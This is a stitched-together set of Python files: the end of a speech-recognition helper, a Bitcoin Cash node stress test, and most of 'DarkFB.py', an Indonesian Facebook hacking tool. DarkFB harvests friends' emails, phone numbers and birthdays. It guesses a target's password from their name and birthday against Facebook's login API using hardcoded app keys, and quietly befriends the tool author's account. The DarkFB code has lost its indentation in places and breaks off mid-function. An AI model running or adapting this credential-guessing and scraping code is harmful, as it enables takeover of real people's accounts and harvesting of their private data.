    common.recog_service = 'azure'
    common.recog_key = key
    common.recog_location = location
    common.recog_paused = False
    worker = threading.Thread(target=recog_thread, daemon=True)
    worker.start()
    print('<<開始語音辨識: 採azure服務>>')
# def 語音辨識azure(key, location='westus'):
# if common.recog_service:
# print("<<語音辨識已啟動>>")
# return
# with common.mic as source:
# print('<<校正麥克風...>>')
# common.recognizer.adjust_for_ambient_noise(source)
# common.stopper = common.recognizer.listen_in_background(
# common.mic, recog_callback, phrase_time_limit=10)
# print('<<開始語音辨識: 採azure服務>>\n<<請說話>>')
# common.recog_countdown = 1000
# common.recog_service = 'azure'
# common.recog_key = key
# common.recog_location = location
# common.recog_paused = False
# def 關閉語音辨識():
# if common.recog_service:
# common.stopper(wait_for_stop=False)
# common.recog_service = False
# print('<<語音辨識程式停止>>')
# else:
# print('<<無語音辨識程式>>')
def 辨識成功了嗎():
    """Return True when a recognition service is active and a result is pending.

    Idiom fix: truth-test the condition directly instead of an if/else that
    returns literal True/False.
    """
    return bool(common.recog_service and common.recog_text)
def 取得辨識文字():
    """Pop and return the latest recognized text ('' when none is pending).

    Bug fix: the original read common.recog_text *before* taking the lock and
    cleared it inside the lock, so a result written by the recognizer thread
    in between was silently lost.  Read and clear now happen atomically.
    """
    with common.lock:
        text = common.recog_text
        common.recog_text = ''
    return text
def 暫停語音辨識():
    """Pause recognition; pending text is cleared and in-flight audio discarded."""
    if common.recog_paused:
        return
    with common.lock:
        common.recog_text = ''
        common.recog_paused = True
        common.recog_discard = True
    print('<<語音辨識暫停>>')
def 繼續語音辨識():
    """Resume a previously paused recognition loop."""
    if not common.recog_paused:
        return
    with common.lock:
        common.recog_paused = False
    print('<<語音辨識繼續>>')
def 語音辨識中嗎():
    """Return True while recognition is live (neither paused nor discarding)."""
    # De Morgan restatement of: not paused and not discard.
    return not (common.recog_paused or common.recog_discard)
if __name__ == '__main__' :
pass
|
p2p_stresstest.py | #!/usr/bin/env python3
# Copyright (c) 2019-2020 Jonathan Toomim
# Copyright (c) 2020 The Bitcoin Cash Node developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
stresstest -- test spam generation and localhost block propagation
This test will be slow at generating transactions unless
you have a very fast SSD or a ramdisk for the wallet files.
It is strongly recommended to run it on a ramdisk.
You can set one up on Linux like this (adapt mountpoint as needed):
sudo mount -t tmpfs -o size=4G tmpfs /mnt/my/ramdisk
sudo chmod a+x /mnt/my/ramdisk
mkdir /mnt/my/ramdisk/tmp
export TMPDIR=/mnt/my/ramdisk/tmp
Then build or copy the software you want to test, onto the ramdisk and
run this script from there.
'''
import http
import traceback
import threading
import time
import os
import sys
from decimal import Decimal
sys.path.insert(0, os.path.join('..', 'functional'))
import test_framework.util # noqa: E402
from test_framework.util import sync_blocks # noqa: E402
from test_framework.test_framework import BitcoinTestFramework # noqa: E402
from test_framework.mininode import P2PInterface # noqa: E402
from test_framework.authproxy import JSONRPCException # noqa: E402
# Number of nodes in the test network; node 0 mines, the rest generate spam.
NUM_NODES = 4
# 168k tx is 32 MB
TX_PER_BLOCK = 10000
# set this below your hardware's peak generation rate if you want
# to have transaction validation happen in parallel with generation,
# or if you otherwise want to simulate lower generation rates.
MAX_GENERATION_RATE_PER_NODE = 15000
# The framework caps node count; raise the cap if this test asks for more.
if NUM_NODES > test_framework.util.MAX_NODES:
    test_framework.util.MAX_NODES = NUM_NODES
# TestNode: A peer we use to send messages to bitcoind, and store responses.
class TestNode(P2PInterface):
    """Plain P2PInterface peer; no extra behavior is needed for this test."""
    pass
class StressTest(BitcoinTestFramework):
    """Spam-generation and block-propagation stress test over NUM_NODES nodes."""

    def skip_test_if_missing_module(self):
        self.skip_if_no_wallet()

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = NUM_NODES
        # Big blocks, no mempool consistency checking, uncapped relay rate and
        # quieter logging, so that tx generation is the only bottleneck.
        self.extra_args = [["-blockmaxsize=32000000",
                            "-checkmempool=0",
                            "-txbroadcastrate=999999",
                            "-debugexclude=net",
                            "-debugexclude=mempool"]] * self.num_nodes

    def make_utxos(self, target=10000):
        """Fund every node's wallet with roughly *target* spendable outputs.

        Returns the per-UTXO amount so run_test can chain spends from it.
        """
        print("Running make_utxos()...")
        rootamount = 49.0 / len(self.nodes)
        # Fan out in stages: each sendmany pays `fanout` fresh addresses.
        fanout = target + 1 if target < 100 else 100 if target < 100 * 50 else target // 50
        num_stages = -(-target // fanout) + 1  # rounds up
        print("Fanout={}, num_stages={}".format(fanout, num_stages))
        self.nodes[0].generate(101)  # mature the first coinbase
        self.nodes[0].generate(num_stages * self.num_nodes - 1)
        time.sleep(0.2)
        self.nodes[0].generate(1)
        node_addresses = [[] for _ in self.nodes]
        self.node_addresses = node_addresses
        t0 = time.time()

        # Fetch fresh addresses from every node in parallel threads.
        def get_addresses(node, addresslist, n):
            for _ in range(n):
                addresslist.append(node.getnewaddress())
        threads = [threading.Thread(target=get_addresses,
                                    args=(self.nodes[i], node_addresses[i], fanout))
                   for i in range(len(self.nodes))]
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()
        t1 = time.time()
        print("Generating addresses took {:3.3f} sec".format(t1 - t0))
        sync_blocks(self.nodes, timeout=10)
        for i in range(self.num_nodes - 1, 0, -1):
            amount = Decimal(round(rootamount / (fanout + 1) * 1e8)) / Decimal(1e8)
            payments = {node_addresses[i][n]: amount for n in range(fanout)}
            t1 = time.time()
            for stage in range(num_stages):
                self.nodes[0].sendmany('', payments)
                t2 = time.time()
                print("Filling node wallets took {:3.3f} sec for stage {}:{}".format(t2 - t1, i, stage))
                self.nodes[0].generate(1)
                sync_blocks(self.nodes)
        # Confirm everything and flush any remaining mempool contents.
        for i in range(1 + (target * self.num_nodes) // 20000):
            self.nodes[0].generate(1)
        sync_blocks(self.nodes, timeout=20)
        blk = self.nodes[0].getblock(self.nodes[0].getbestblockhash(), 1)
        print("Block has {} transactions and is {} bytes".format(len(blk['tx']), blk['size']))
        return amount

    def check_mempools(self):
        """Print each node's mempool size/bytes and return the list of sizes."""
        results = []
        for node in self.nodes:
            res = node.getmempoolinfo()
            results.append(res)
        print("Mempool sizes:\t", ("%7i " * len(self.nodes)) % tuple([r['size'] for r in results]), '\t',
              "Mempool bytes:\t", ("%9i " * len(self.nodes)) % tuple([r['bytes'] for r in results]))
        return [r['size'] for r in results]

    def generate_spam(self, value, txcount):
        """Have every node but node0 send *txcount* txs, then measure mempool
        sync speed and block generation/propagation times."""
        def helper(node, count, rate=100):
            # Rate-limited sendtoaddress loop run in a thread for one node.
            t = time.time()
            addresses = self.node_addresses[node]
            for i in range(0, count):
                now = time.time()
                if i / (now - t) > rate:
                    time.sleep(i / rate - (now - t))
                if not (i % 500):
                    print("Node {:2d}\ttx {:5d}\tat {:3.3f} sec\t({:3.0f} tx/sec)".format(node,
                          i, time.time() - t, (i / (time.time() - t))))
                add = addresses[i % len(addresses)]
                try:
                    # Trailing `1` requests the node's "fast" send path.
                    self.nodes[node].sendtoaddress(add, value, '', '', False, 1)
                except http.client.CannotSendRequest:
                    # Transient RPC hiccup: retry once.
                    self.nodes[node].sendtoaddress(add, value, '', '', False, 1)
                except JSONRPCException:
                    print("Warning: this bitcoind appears to not support the 'fast' argument for sendtoaddress")
                    self.nodes[node].sendtoaddress(add, value, '', '', False)
                except BaseException:
                    print("Node {} had a fatal error on tx {}:".format(node, i))
                    traceback.print_exc()
                    break
        threads = [threading.Thread(target=helper, args=(n, txcount, MAX_GENERATION_RATE_PER_NODE))
                   for n in range(1, len(self.nodes))]
        t0 = time.time()
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()
        t1 = time.time()
        print("Generating spam took {:3.3f} sec for {} tx (total {:4.0f} tx/sec)".format(t1 - t0,
              (self.num_nodes - 1) * txcount, (self.num_nodes - 1) * txcount / (t1 - t0)))
        # Poll until mempools converge across nodes, giving up after ~5
        # consecutive seconds with no progress.
        startresults = results = self.check_mempools()
        onedone = False
        finishresults = []
        timeout = 0
        oldresults = self.check_mempools()
        while [r for r in results if abs(r - results[0]) > 10] and (timeout < 5):
            time.sleep(1)
            results = self.check_mempools()
            if results == oldresults:
                timeout += 1
            else:
                timeout = 0
                oldresults = results
            if not onedone and [r for r in results if abs(r - txcount * (self.num_nodes - 1)) < 10]:
                # First node to hold (approximately) all spam marks t1b.
                finishresults = results
                t1b = time.time()
                onedone = True
        t2 = time.time()
        print("Mempool sync took {:3.3f} sec".format(t2 - t1))
        if timeout >= 5:
            print("Warning: Not all transactions were fully propagated")
        if not finishresults:
            t1b = time.time()
            finishresults = results
            print("Warning: Number of mempool transactions was at least 10 less than expected")
        deltas = [r - s for r, s in zip(finishresults, startresults)]
        print("Per-node ATMP tx/sec: " + ("\t%4.0f" * self.num_nodes) % tuple([d / (t1b - t1) for d in deltas]))
        print("Average mempool sync rate: \t{:4.0f} tx/sec".format(sum(deltas) / (t1b - t1) / len(deltas)))
        # Two rounds of block generation: the first is timed and printed, the
        # second (i == 1) runs silently to confirm a stable follow-up block.
        for i in range(2):
            t2a = time.time()
            oldheight = self.nodes[0].getblockcount()
            if not i:
                print("Generating block ", end="")
            self.nodes[0].generate(1)
            t2b = time.time()
            if not i:
                print("took {:3.3f} sec".format(t2b - t2a))
            for n in range(self.num_nodes):
                # Busy-wait until node n has accepted the new block.
                while self.nodes[n].getblockcount() == oldheight:
                    time.sleep(0.05)
                t2c = time.time()
                if not i:
                    print("{}:{:6.3f} ".format(n, t2c - t2b), end="")
            if not i:
                print()
            sync_blocks(self.nodes, timeout=180)
            t2c = time.time()
            if not i:
                print("Propagating block took {:3.3f} sec -- {:3.3f} sec per hop".format(t2c -
                      t2b, (t2c - t2b) / (self.num_nodes - 1)))
            blk = self.nodes[0].getblock(self.nodes[0].getbestblockhash(), 1)
            if not i:
                print("Block has {} transactions and is {} bytes".format(len(blk['tx']), blk['size']))

    def run_test(self):
        # Setup the p2p connections
        self.log.info("Running tests:")
        print(self.nodes[0].getmempoolinfo())
        tx_per_node = int(TX_PER_BLOCK / (self.num_nodes - 1))
        # We will need UTXOs to construct transactions in later tests.
        utxo_value = self.make_utxos(tx_per_node)
        spend_value = utxo_value
        for i in range(5):
            # Subtract the 192-satoshi fee from the spendable amount each round.
            spend_value = Decimal((spend_value * 100000000 - 192)) / Decimal(1e8)
            print("Spam block generation round {}".format(i))
            self.generate_spam(spend_value, txcount=int(tx_per_node))
if __name__ == '__main__':
StressTest().main()
|
DarkFB.py | # -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Mozilla/5.0 (Linux; Android 5.0; ASUS ZenFone 2 Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36')]
def keluar():
print '\x1b[1;91m[!] Tutup'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mPremium\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m The Magizz \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/TheMagizz\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mFB \x1b[1;91m: \x1b[1;92\x1b[92mhttps://fb.me/rizz.magizz\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://m.facebook.com/rizz.magizz')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('sayang')
